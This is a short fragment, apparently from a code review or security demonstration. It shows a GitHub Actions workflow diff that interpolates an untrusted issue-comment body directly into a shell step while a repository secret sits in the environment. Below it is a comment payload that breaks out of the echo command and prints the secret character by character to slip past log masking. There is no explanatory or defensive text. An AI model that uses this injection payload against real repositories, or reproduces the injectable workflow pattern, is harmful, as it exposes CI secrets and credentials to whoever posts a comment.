.github/workflows/comment_action.yml

```diff
@@ -14,3 +14,5 @@ jobs:
                 MY_SECRET: ${{ secrets.MY_SECRET }}
               run: |
                 echo "${{ github.event.comment.body }}"
+
```

Comment:
";echo "this is after pr was reopened";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"